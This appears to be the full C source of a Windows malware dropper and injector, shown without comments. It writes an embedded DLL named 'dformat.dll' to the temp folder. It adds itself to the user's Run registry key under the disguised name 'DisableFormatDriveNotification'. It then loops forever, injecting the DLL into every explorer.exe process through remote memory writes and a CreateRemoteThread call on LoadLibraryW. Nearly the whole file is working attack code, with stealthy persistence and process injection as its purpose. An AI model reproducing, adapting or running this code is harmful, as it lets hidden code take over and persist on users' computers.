#include        "defs.h"


int __cdecl     wmain(int argc, wchar_t **argv){
        HKEY    hKey;
        WCHAR   wsModulePath[MAX_PATH];
        WCHAR   wsDllPath[MAX_PATH];
        WCHAR   wsEventName[MAX_PATH];
        size_t  len;
        PSYSTEM_PROCESS_INFORMATION     pspi, pspi_tmp;
        UNICODE_STRING                  us;
        ULONG   cbNeeded;
        HANDLE  hProcess, hThread, hEvent, hFile;
        ULONG_PTR pLoadLibrary;
        PVOID   lpBuffer;
        WCHAR   wsTempPath[MAX_PATH];
        PVOID   resBuff;
        DWORD   resSize, dwWritten, dwError;
        
        memset(wsDllPath, 0, sizeof(wsDllPath));
        GetTempPath(MAX_PATH, wsDllPath);
        StringCchCat(wsDllPath, MAX_PATH, L"\\dformat.dll");
        hFile = CreateFile(wsDllPath, GENERIC_WRITE, 0,0, CREATE_ALWAYS, 0,0);
        if (hFile == INVALID_HANDLE_VALUE) return 1;
        
        resBuff = LockResource(LoadResource(GetModuleHandle(0), FindResource(GetModuleHandle(0), MAKEINTRESOURCE(IDR_DFORMAT), L"BIN")));
        resSize = SizeofResource(GetModuleHandle(0), FindResource(GetModuleHandle(0), MAKEINTRESOURCE(IDR_DFORMAT), L"BIN"));
        
        WriteFile(hFile, resBuff, resSize, &dwWritten, 0);
        FlushFileBuffers(hFile);
        CloseHandle(hFile);
        
        memset(wsModulePath, 0, sizeof(wsModulePath));
        GetModuleFileName(GetModuleHandle(0), wsModulePath, MAX_PATH);
        
        RegOpenKeyEx(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &hKey);
        
        StringCbLength(wsModulePath, STRSAFE_MAX_CCH  * sizeof(WCHAR), &len);
        len+=sizeof(WCHAR);
        RegSetValueEx(hKey, L"DisableFormatDriveNotification", 0, REG_SZ, (const BYTE *)wsModulePath, (DWORD)len);
        RegCloseKey(hKey);
        
        RtlInitUnicodeString(&us, L"explorer.exe");

        pLoadLibrary = (ULONG_PTR)GetProcAddress(LoadLibrary(L"kernel32.dll"), "LoadLibraryW");
__CycleExplorer:         
        pspi = pspi_tmp = (PSYSTEM_PROCESS_INFORMATION)VirtualAlloc(0, 0x100000, MEM_COMMIT, PAGE_READWRITE);
        ZwQuerySystemInformation(SystemProcessInformation, pspi, 0x100000, &cbNeeded);
     
        for (;;){
                if (!pspi->ImageName.Buffer) goto __NextPid;
                if (RtlCompareUnicodeString(&pspi->ImageName, &us, TRUE)) goto __NextPid;        
                
                StringCchPrintf(wsEventName, MAX_PATH, L"DisableFormatDriveNotification%.08X", pspi->UniqueProcessId);
                hEvent = OpenEvent(EVENT_ALL_ACCESS, FALSE, wsEventName);
                if (hEvent){
                        CloseHandle(hEvent);
                        goto __NextPid;
                }
                
                hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)((ULONG_PTR)pspi->UniqueProcessId));
                if (!hProcess) goto __NextPid;
                
                lpBuffer = VirtualAllocEx(hProcess, 0, 0x1000, MEM_COMMIT, PAGE_READWRITE);
                if (!lpBuffer){
                        CloseHandle(hProcess);
                        goto __NextPid;
                }
                
                WriteProcessMemory(hProcess, lpBuffer, wsDllPath, sizeof(wsDllPath), 0);
                hThread = CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pLoadLibrary, lpBuffer, 0, NULL);
                WaitForSingleObject(hThread, INFINITE);
                CloseHandle(hThread);
                VirtualFreeEx(hProcess, lpBuffer, 0x1000, MEM_DECOMMIT);
                VirtualFreeEx(hProcess, lpBuffer, 0, MEM_RELEASE);
                CloseHandle(hProcess);
                      


__NextPid:                
                if (pspi->NextEntryOffset == 0) break;
                pspi = (PSYSTEM_PROCESS_INFORMATION)((ULONG_PTR)pspi + pspi->NextEntryOffset);
        }
        
        VirtualFree(pspi_tmp, 0x100000, MEM_DECOMMIT);
        VirtualFree(pspi_tmp, 0, MEM_RELEASE);
        Sleep(5000);
        goto __CycleExplorer;
}
